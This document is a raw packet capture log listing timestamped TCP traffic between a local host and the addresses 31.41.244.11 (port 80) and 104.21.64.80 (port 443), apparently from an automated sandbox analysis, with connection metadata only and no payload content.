Dec 18, 2024 13:38:27.267523050 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.269531012 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.269591093 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.269629955 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.269681931 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.271446943 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.271507978 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.271549940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.271601915 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.277674913 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277708054 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277720928 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277734041 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277751923 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277766943 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.277797937 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.277873993 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.279705048 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.279767036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.279812098 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.279865980 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.281878948 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.281934023 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.281945944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.281992912 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.283929110 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.283987045 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.283998013 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.284054041 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.285939932 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.285998106 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.286087036 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.286139965 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.288005114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.288070917 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.288228989 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.288296938 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.290205956 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.290290117 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.290314913 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.290369987 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.292321920 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.292335987 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.292383909 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.294264078 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.294325113 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.294660091 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.294713020 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.296288013 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.296365976 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.296437979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.296494961 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.298291922 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.298357964 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.298399925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.298449993 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.300422907 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.300491095 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.300513029 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.300564051 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.302911043 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.302968025 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.303335905 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.303390026 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.309700966 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309715986 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309729099 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309778929 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.309783936 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309797049 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.309818983 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309832096 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.309842110 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.309875011 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.310839891 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.310893059 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.396503925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.396522999 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.396768093 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.396828890 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.396845102 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.396903038 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.396943092 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.398777008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.398840904 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.398916006 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.398964882 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.400516033 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.400571108 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.400580883 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.400618076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.402298927 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.402379036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.402470112 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.402518034 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.404036045 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.404088974 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.404134989 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.404187918 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.405839920 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.405854940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.405898094 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.407571077 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.407639980 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.407665014 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.407744884 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.409219980 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.409240961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.409275055 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.409293890 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.410872936 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.410887957 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.410928965 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.412436008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.412497997 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.412537098 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.412589073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.414200068 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.414212942 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.414259911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570528984 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570578098 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570614100 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570612907 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570647001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570655107 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570658922 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570703030 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570728064 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570761919 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570776939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570799112 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570805073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570833921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570848942 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570868969 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570883989 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570904016 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.570920944 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.570960045 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571069956 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571105003 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571134090 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571137905 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571155071 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571173906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571188927 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571208954 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571223021 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571252108 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571264029 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571286917 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571295023 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571333885 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571348906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571404934 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571417093 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571451902 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571469069 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571504116 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571537971 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571563959 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571574926 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571608067 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571611881 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571643114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571676970 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571676970 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571697950 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571715117 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571738958 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571748972 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571782112 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571785927 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571789980 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571820974 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571832895 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571857929 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571866035 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571901083 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571914911 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571950912 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571963072 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.571985006 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.571997881 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572021008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572041035 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572055101 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572066069 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572091103 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572103024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572124958 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572139978 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572161913 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572170973 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572196960 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572210073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572235107 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572242022 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572283030 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572292089 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572326899 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572341919 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572360039 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572385073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572395086 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572397947 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572429895 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572446108 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572465897 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572483063 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572499990 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572520971 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572550058 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572556019 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572590113 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572602987 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572624922 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572637081 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572659969 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572674036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572695971 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572709084 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572732925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572738886 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572770119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572779894 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572814941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572818995 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572855949 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572860003 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572900057 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.572962999 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.572997093 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573029041 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573036909 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573065042 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573076010 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573097944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573116064 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573133945 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573148966 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573167086 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573184967 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573208094 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573209047 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573241949 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573254108 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573278904 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573287964 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573328972 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573357105 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573396921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573417902 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573431015 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573441029 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573467970 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573478937 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573502064 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573514938 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573539019 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573559046 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573580027 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573596001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573615074 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573621988 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573647976 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573667049 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573683023 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573698997 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573719025 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573729992 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573754072 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573765039 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573788881 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573800087 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573829889 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573836088 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573859930 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.573878050 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.573906898 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.584938049 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:27.585058928 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:27.588203907 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.588260889 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.588298082 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.588335037 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.588757038 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.588812113 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.589158058 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.589211941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.589346886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.589396954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.589772940 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:27.589781046 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:27.590073109 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:27.590581894 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.590641022 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.590811014 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.590862036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.592076063 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.592111111 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.592140913 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.592156887 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.593434095 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.593487024 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.593492031 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.593535900 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.594875097 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.594932079 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.594997883 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.595067024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.596343994 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.596407890 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.596414089 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.596458912 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.597759008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.597827911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.597955942 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.598002911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.599361897 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.599436045 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.599576950 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.599633932 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.600816011 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.600872993 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.600898981 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.600946903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.602349043 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.602412939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.602449894 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.602500916 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.603653908 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.603718042 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.603784084 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.603836060 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.605103016 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.605138063 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.605185032 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.605205059 CET	49712	80	192.168.2.8	31.41.244.11
